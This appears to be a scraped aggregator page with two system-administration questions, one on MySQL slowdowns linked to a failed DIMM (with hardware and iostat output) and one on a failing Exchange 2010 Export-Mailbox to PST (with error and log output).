  • Mysql performance problem & Failed DIMM

    - by murdoch
    Hi I have a dedicated mysql database server which has been having some performance problems recently, under normal load the server will be running fine, then suddenly out of the blue the performance will fall off a cliff. The server isn't using the swap file and there is 12GB of RAM in the server, more than enough for its needs. After contacting my hosting comapnies support they have discovered that there is a failed 2GB DIMM in the server and have scheduled to replace it tomorow morning. My question is could a failed DIMM result in the performance problems I am seeing or is this just coincidence? My worry is that they will replace the ram tomorrow but the problems will persist and I will still be lost of explanations so I am just trying to think ahead. The reason I ask is that there is plenty of RAM in the server, more than required and simply missing 2GB should be a problem, so if this failed DIMM is causing these performance problems then the OS must be trying to access the failed DIMM and slowing down as a result. Does that sound like a credible explanation? This is what DELLs omreport program says about the RAM, notice one dimm is "Critical" Memory Information Health : Critical Memory Operating Mode Fail Over State : Inactive Memory Operating Mode Configuration : Optimizer Attributes of Memory Array(s) Attributes : Location Memory Array 1 : System Board or Motherboard Attributes : Use Memory Array 1 : System Memory Attributes : Installed Capacity Memory Array 1 : 12288 MB Attributes : Maximum Capacity Memory Array 1 : 196608 MB Attributes : Slots Available Memory Array 1 : 18 Attributes : Slots Used Memory Array 1 : 6 Attributes : ECC Type Memory Array 1 : Multibit ECC Total of Memory Array(s) Attributes : Total Installed Capacity Value : 12288 MB Attributes : Total Installed Capacity Available to the OS Value : 12004 MB Attributes : Total Maximum Capacity Value : 196608 MB Details of Memory Array 1 Index : 0 Status : Ok Connector Name : DIMM_A1 Type : DDR3-Registered Size : 2048 MB Index : 1 Status : Ok Connector Name : DIMM_A2 Type : DDR3-Registered Size : 2048 MB Index : 2 Status : Ok Connector Name : DIMM_A3 Type : DDR3-Registered Size : 2048 MB Index : 3 Status : Critical Connector Name : DIMM_B1 Type : DDR3-Registered Size : 2048 MB Index : 4 Status : Ok Connector Name : DIMM_B2 Type : DDR3-Registered Size : 2048 MB Index : 5 Status : Ok Connector Name : DIMM_B3 Type : DDR3-Registered Size : 2048 MB the command free -m shows this, the server seems to be using more than 10GB of ram which would suggest it is trying to use the DIMM total used free shared buffers cached Mem: 12004 10766 1238 0 384 4809 -/+ buffers/cache: 5572 6432 Swap: 2047 0 2047 iostat output while problem is occuring avg-cpu: %user %nice %system %iowait %steal %idle 52.82 0.00 11.01 0.00 0.00 36.17 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 47.00 0.00 576.00 0 576 sda1 0.00 0.00 0.00 0 0 sda2 1.00 0.00 32.00 0 32 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 46.00 0.00 544.00 0 544 avg-cpu: %user %nice %system %iowait %steal %idle 53.12 0.00 7.81 0.00 0.00 39.06 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 49.00 0.00 592.00 0 592 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 49.00 0.00 592.00 0 592 avg-cpu: %user %nice %system %iowait %steal %idle 56.09 0.00 7.43 0.37 0.00 36.10 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 232.00 0.00 64520.00 0 64520 sda1 0.00 0.00 0.00 0 0 sda2 159.00 0.00 63728.00 0 63728 sda3 
0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 73.00 0.00 792.00 0 792 avg-cpu: %user %nice %system %iowait %steal %idle 52.18 0.00 9.24 0.06 0.00 38.51 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 49.00 0.00 600.00 0 600 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 49.00 0.00 600.00 0 600 avg-cpu: %user %nice %system %iowait %steal %idle 54.82 0.00 8.64 0.00 0.00 36.55 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 100.00 0.00 2168.00 0 2168 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 100.00 0.00 2168.00 0 2168 avg-cpu: %user %nice %system %iowait %steal %idle 54.78 0.00 6.75 0.00 0.00 38.48 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 84.00 0.00 896.00 0 896 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 84.00 0.00 896.00 0 896 avg-cpu: %user %nice %system %iowait %steal %idle 54.34 0.00 7.31 0.00 0.00 38.35 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 81.00 0.00 840.00 0 840 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 81.00 0.00 840.00 0 840 avg-cpu: %user %nice %system %iowait %steal %idle 55.18 0.00 5.81 0.44 0.00 38.58 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 317.00 0.00 105632.00 0 105632 sda1 0.00 0.00 0.00 0 0 sda2 224.00 0.00 104672.00 0 104672 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 93.00 0.00 960.00 0 960 avg-cpu: %user %nice %system %iowait %steal %idle 55.38 0.00 7.63 0.00 0.00 36.98 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 74.00 0.00 800.00 0 800 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 74.00 0.00 800.00 0 800 avg-cpu: %user %nice %system %iowait %steal %idle 56.43 0.00 7.80 0.00 0.00 35.77 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 72.00 0.00 784.00 0 784 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 72.00 0.00 784.00 0 784 avg-cpu: %user %nice %system %iowait %steal %idle 54.87 0.00 6.49 0.00 0.00 38.64 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 80.20 0.00 855.45 0 864 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 80.20 0.00 855.45 0 864 avg-cpu: %user %nice %system %iowait %steal %idle 57.22 0.00 5.69 0.00 0.00 37.09 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 33.00 0.00 432.00 0 432 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 33.00 0.00 432.00 0 432 avg-cpu: %user %nice %system %iowait %steal %idle 56.03 0.00 7.93 0.00 0.00 36.04 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 41.00 0.00 560.00 0 560 sda1 0.00 0.00 0.00 0 0 sda2 2.00 0.00 88.00 0 88 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 39.00 0.00 472.00 0 472 avg-cpu: %user %nice %system %iowait %steal %idle 55.78 0.00 5.13 0.00 0.00 39.09 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 29.00 0.00 392.00 0 392 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 29.00 0.00 392.00 0 392 avg-cpu: %user %nice %system %iowait %steal %idle 53.68 0.00 8.30 0.06 0.00 37.95 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 78.00 0.00 4280.00 0 4280 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 78.00 0.00 4280.00 0 4280

    Read the article

  • Exchange 2010 PST-Export fails

    - by Chake
    I'm horribly failing at exporting Exchnange Mailboxes to PST files. Perhaps You are able to help me? The System I'm running some legacy machines here. The one I'm currently working on (CurrentDC) is a Windows 2008 R2 Server with Exchange 2010 on it. Exchange seems to be poorly patched: [PS] C:\>get-exchangeserver Name Site ServerRole Edition AdminDisplayVersion ---- ---- ---------- ------- ------------------- OldDC None Enterprise Version 6.5 (Bui... CurrentDC company.local Mailbox,... Enterprise Version 14.0 (Bu... The Problem After some trouble I managed to get the Export-Mailbox command run: [PS] C:\>Export-Mailbox -Identity marco -PSTFolderPath C:\ExchangeExport According to several Websites that seems to be the right command to export the mailbox of the user "marco" to "C:\ExchangeExport". But after running the command an error occurs (I'm sorry, it is the german version of Windows 2008 - but if you translate Fehler with error and Vorgang with process you should be prepared enough to go ;)) [PS] C:\Export-Mailbox -Identity marco -PSTFolderPath C:\ExchangeExport Fehler für Marco S ([email protected]). Ursache: Fehler bei diesem Vorgang., Fehlercode: -2147467259. + CategoryInfo : InvalidOperation: (0:Int32) [Export-Mailbox], RecipientTaskException + FullyQualifiedErrorId : 2317FD3A,Microsoft.Exchange.Management.RecipientTasks.ExportMailbox RunspaceId : 44415363-371e-44a1-a682-61e6a9b90c86 Identity : company.local/Company User/Marco S DistinguishedName : CN=Marco S,OU=Company User,DC=company,DC=local DisplayName : Marco S Alias : marco LegacyExchangeDN : /o=Erste Organisation/ou=Erste administrative Gruppe/cn=Recipients/cn=marco PrimarySmtpAddress : [email protected] SourceServer : CurrentDC.company.local SourceDatabase : Mailbox Database 0279110169 SourceGlobalCatalog : CurrentDC SourceDomainController : TargetGlobalCatalog : CurrentDC TargetDomainController : TargetMailbox : TargetServer : TargetDatabase : MailboxSize : 0 B (0 bytes) IsResourceMailbox : False SIDUsedInMatch : SMTPProxies : SourceManager : SourceDirectReports : SourcePublicDelegates : SourcePublicDelegatesBL : SourceAltRecipient : SourceAltRecipientBL : SourceDeliverAndRedirect : MatchedTargetNTAccountDN : IsMatchedNTAccountMailboxEnabled : MatchedContactsDNList : TargetNTAccountDNToCreate : TargetManager : TargetDirectReports : TargetPublicDelegates : TargetPublicDelegatesBL : TargetAltRecipient : TargetAltRecipientBL : TargetDeliverAndRedirect : Options : Default SourceForestCredential : TargetForestCredential : TargetFolder : PSTFilePath : C:\ExchangeExport\marco.pst RecoveryMailboxGuid : RecoveryMailboxLegacyExchangeDN : RecoveryMailboxDisplayName : RecoveryDatabaseGuid : StandardMessagesDeleted : 0 AssociatedMessagesDeleted : 0 DumpsterMessagesDeleted : 0 MoveType : ExportToPST MoveStage : Validation StartTime : 05.10.2012 13:55:46 EndTime : 05.10.2012 13:55:46 StatusCode : -2147467259 StatusMessage : Fehler bei diesem Vorgang. ReportFile : C:\Program Files\Microsoft\Exchange Server\V14\Logging\MigrationLogs\export-Mailbox20121005-135545-8170000.xml ServerName : CurrentDC.company.local What I have done Well, I must say I'm quite clueless. I was wondering why MailboxSize is 0 - so I checked it: [PS] C:\>Get-MailboxStatistics marco | ft DisplayName, TotalItemSize, ItemCount DisplayName TotalItemSize ItemCount ----------- ------------- --------- Marco S 473 MB (496,011,572 bytes) 4173 Well, this i not 0 bytes - but I don't know what to do with this information. 
Also I had a look at the ReportFile mentioned in the output: <?xml version="1.0"?> <export-Mailbox> <TaskHeader> <RunningAs>NT-AUTORITÄT\SYSTEM</RunningAs> <Name>export-Mailbox</Name> <Type>ExportToPST</Type> <MaxBadItems>0</MaxBadItems> <Version>14.0.639.21</Version> <StartTime>10.05.2012 14:19:12</StartTime> <Options Identity="marco" PSTFolderPath="C:\ExchangeExport" DeleteContent="False" DeleteAssociatedMessages="False" GlobalCatalog="CurrentDC" MaxThreads="4" BadItemLimit="0" ValidateOnly="False" IncludeFolders="" ExcludeFolders="" StartDate="01.01.0001 00:00:00" EndDate="31.12.9999 23:59:59" SubjectKeywords="" ContentKeywords="" AllContentKeywords="" AttachmentFilenames="" SenderKeywords="" RecipientKeywords="" Locale="" /> </TaskHeader> <TaskDetails> <Item MailboxName="Marco S"> <Source> <Identity>company.local/Company User/Marco S</Identity> <DistinguishName>CN=Marco Sc,OU=Company User,DC=company,DC=local</DistinguishName> <DisplayName>Marco S</DisplayName> <Alias>marco</Alias> <LegacyExchangeDN>/o=Erste Organisation/ou=Erste administrative Gruppe/cn=Recipients/cn=marco</LegacyExchangeDN> <PrimarySmtpAddress>[email protected]</PrimarySmtpAddress> <SourceServer>CurrentDC.company.local</SourceServer> <SourceDatabase>Mailbox Database 0279110169</SourceDatabase> <IsResourceMailbox>False</IsResourceMailbox> <SourceGlobalCatalog>CurrentDC</SourceGlobalCatalog> </Source> <Target> <PSTFilePath>C:\ExchangeExport\marco.pst</PSTFilePath> </Target> <MailboxSize>0 B (0 bytes)</MailboxSize> <Duration>00:00:00</Duration> <Result IsWarning="False" ErrorCode="-2147467259">Fehler bei diesem Vorgang.</Result> </Item> </TaskDetails> <TaskFooter> <EndTime>10.05.2012 14:19:13</EndTime> <TotalSize>0 B (0 bytes)</TotalSize> <StandardMessagesDeleted>0</StandardMessagesDeleted> <AssociatedMessagesDeleted>0</AssociatedMessagesDeleted> <DumpsterMessagesDeleted>0</DumpsterMessagesDeleted> <Result ErrorCount="1" CompletedCount="0" WarningCount="0" /> </TaskFooter> </export-Mailbox> Do you have any clue? <UPDATE> Regarding to the answer from downthepub I tried to use UNC paths - no change. Also I tried installing the management tools to a client and run the scripts from there - no way, too. </UPDATE> Thanks a lot for reading this mess!

    Read the article
